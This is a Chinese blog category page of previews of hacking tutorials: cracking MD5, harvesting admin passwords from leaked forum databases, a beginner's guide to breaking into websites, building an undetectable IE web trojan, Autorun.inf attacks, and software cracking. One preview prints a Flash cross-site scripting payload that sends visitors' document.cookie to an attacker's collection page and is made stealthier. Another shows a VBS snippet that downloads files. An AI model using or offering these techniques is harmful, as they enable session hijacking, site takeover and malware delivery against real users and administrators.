Google [站内搜索]

分类: 网络破解预览模式: 普通 | 列表

对动网的一个误解

曾经尝试过暴力破解MD5密文,在不明所以的情况下,暴力破解成功率微乎其微,虽有传闻山东大学的王小云教授破译MD5加密法,但终究也未见什么先进的破解软件或算法出来,因而对MD5是非常信任的,一直也都认为只要密码设置复杂一些,数据库文件名以及路径改不改不是非常重要。注意密码一定要复杂一些,如果为纯数字10位以下的密码,有些破解软件几秒内就能破解出来的!

今天看了一篇文章说有些管理员没有及时的清空日志的习惯,而这些日志都保存在数据库中,才觉得事情没有想像中的简单,打开Google搜索data/dvbbs7.mdb,下载了一论坛数据库,打开Dv_log表,复制其l_content字段中的所有内容粘贴到记事本,搜索password,下边是我提取出来的关键信息:

查看更多...

分类:网络破解 | 固定链接 | 评论: 1 | 引用: 0 | 查看次数: 9792

关于IE执行任意程序漏洞的深入分析

1. 漏洞回顾
2. 进一步追踪
3. IE可本地执行任意命令分析
4. IE的ActiveX安全设置可被绕过分析
5. 扩展:扩展:IE的DHTML实现中关于html源码再解析部分和IE的安全机制脱节

查看更多...

分类:网络破解 | 固定链接 | 评论: 1 | 引用: 0 | 查看次数: 5572

新人零起步接触黑客之网站入侵知识

昨天大家对黑客名词有了一些了解后,我们今天来介绍点别的东西,介绍点入侵时常见的名词和一些入侵的方法,好了不废话了下面开始。

  首先介绍下什么样的站点可以入侵:必须是动态的网站,比如asp、php、jsp 这种形式的站点。后缀为.htm的站点劝大家还是不要入侵了吧(入侵几率几乎为0)。

  入侵介绍: 1 上传漏洞;2 暴库;3 注入;4 旁注;5 COOKIE诈骗。

查看更多...

分类:网络破解 | 固定链接 | 评论: 1 | 引用: 0 | 查看次数: 4773

用VBS可执行程序+Xmlhttp下载网络文件

'On Error Resume Next
Dim iRemote,iLocal
iRemote = InputBox("请输入远程文件路径:")
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET",iRemote,0

查看更多...

分类:网络破解 | 固定链接 | 评论: 1 | 引用: 0 | 查看次数: 5336

反编译工具jad简单用法

以下假设jad.exe在c:\java目录下


一、基本用法

查看更多...

分类:网络破解 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 4831

用三种方法破解“ICO精灵V2.0”

软件介绍
ICO精灵V2.0是一款ICO图标的处理工具,它包含图标的提取和位图与图标批量互转功能。
下载地址
http://www.onlinedown.net/soft/8021.htm

查看更多...

分类:网络破解 | 固定链接 | 评论: 1 | 引用: 0 | 查看次数: 5561

打造一个完美的IE网页木马

既然要打造完美的IE网页木马,首先就必须给我们的完美制定一个标准,我个人认为一个完美的IE网页木马至少应具备下列四项特征:
  一:可以躲过杀毒软件的追杀;
  二:可以避开网络防火墙的报警;
  三:能够适用于多数的WINDOWS操作系统(主要包括WIN98、WINME、WIN2000、WINXP、WIN2003)中的多数IE版本(主要包括IE5.0、IE5.5、IE6.0),最好能打倒SP补丁;
  四:让浏览者不容易发觉IE变化,即可以悄无声息,从而可以长久不被发现。

查看更多...

分类:网络破解 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 5159

防止Flash跨站攻击弹出IE窗口

前些天一直忙着学习WIN32汇编,一直懒得写文章,这些天来好像Flash跨站攻击闹的挺凶的,但在实施Flash跨站攻击时的那个弹出的IE窗口很容易引起别人的怀疑,而使得Flash跨站攻击失败,这的确让人多少有点头疼,大家是不是也一直在寻找实施Flash跨站攻击时不弹出IE窗口的方法来隐藏自己的攻击行为呢?下面大家和我一起来解决这个不大不小的问题,让Flash跨站攻击更完美吧!
一般来说大家在进行Flash跨站攻击时都是自己做一个Flash动画,并在第一帧中加入用于跳转到其他URL的AtionScript脚本函数,如下:
getURL("BLOCKED SCRIPTwindow.open(’http://用于收集Cookie的网页地址?’+document cookie)","_self") 然后把这个Flash动画置于论坛中的签名、贴子或短信消息中,用来获得管理员或用户的Cookie,从而得到管理权限,进一步伺机控制整个站点,最终达到自己的目的。我们可以看到在整个跨站攻击中最重要的就是这个AtionScript脚本啦!也就是这个脚本中用到的代码打开了一个我们又爱又恨的窗口,所以我们也只能从改造这个脚本代码来实现隐藏或者是去掉弹出的IE窗口,除此外别无它法!
我们先分析一下上面的AtionScript脚本,它使用AtionScript脚本函数"getURL"跳转到一个使用JavaScript协议的URL(JavaScript协议后面就是我们非常熟悉的JavaScript脚本代码),在JavaScript中使用document.cookie的到Cookie,并把Cookie和一个用于收集Cookie的网页地址连成一个http协议的URL地址,最后使用window.open打开合成的URL地址,从而把Cookie用GET方式发送到用于收集Cookie的网页,并记录下来。
通过上面的分析我们进一步了解那个弹出的IE窗口是由于JavaScript协议中的代码window.open所生成的,相信大家都知道window.open的第二个参数用来指定打开的窗口的名字,其通用名称有"_media (IE6.0 在浏览器左边的媒体面板内打开)"、"_blank (在新窗口中打开)"、"_parent (在当前框架的父框架内打开。假如当前框架无父框架,此参数值等同于 _self)"、"_search (IE5.0 在浏览器左边的搜索面板内打开)"、"_self(在当前窗口中打开,覆盖当前文档)"、"_top (在所有框架之外的最顶层窗口中打开 。假如当前窗口无框架结构,此参数值等同于 _self )"等几种,如果我们以"_search"来打开窗口,不是就没有了弹出的IE窗口了吗?AtionScript脚本改为:

查看更多...

分类:网络破解 | 固定链接 | 评论: 1 | 引用: 0 | 查看次数: 5059

解析来自Autorun.inf文件的攻击

最近网上流行通过AutoRun.inf文件使对方所有的硬盘完全共享或中木马的方法,由于AutoRun.inf文件在黑客技术中的应用还是很少见的,相应的资料也不多,有很多人对此觉得很神秘,本文试图为您解开这个迷,使您能完全的了解这个并不复杂却极其有趣的技术。
  一、理论基础

  经常使用光盘的朋友都知道,有很多光盘放入光驱就会自动运行,它们是怎么做的呢?光盘一放入光驱就会自动被执行,主要依靠两个文件,一是光盘上的AutoRun.inf文件,另一个是操作系统本身的系统文件之一的Cdvsd.vxd。Cdvsd.vxd会随时侦测光驱中是否有放入光盘的动作,如果有的话,便开始寻找光盘根目录下的AutoRun.inf文件。如果存在AutoRun.inf文件则执行它里面的预设程序。

查看更多...

分类:网络破解 | 固定链接 | 评论: 1 | 引用: 0 | 查看次数: 5038

搜索1diu.com站点Flash地址

网站地址:http://www.1diu.com/

说明:该站Flash地址相关的文件共有三个,/include/top.js、/npic/ctrl.js和显示Flash页面(称为index.htm)。

相关代码:

查看更多...

分类:网络破解 | 固定链接 | 评论: 1 | 引用: 0 | 查看次数: 9625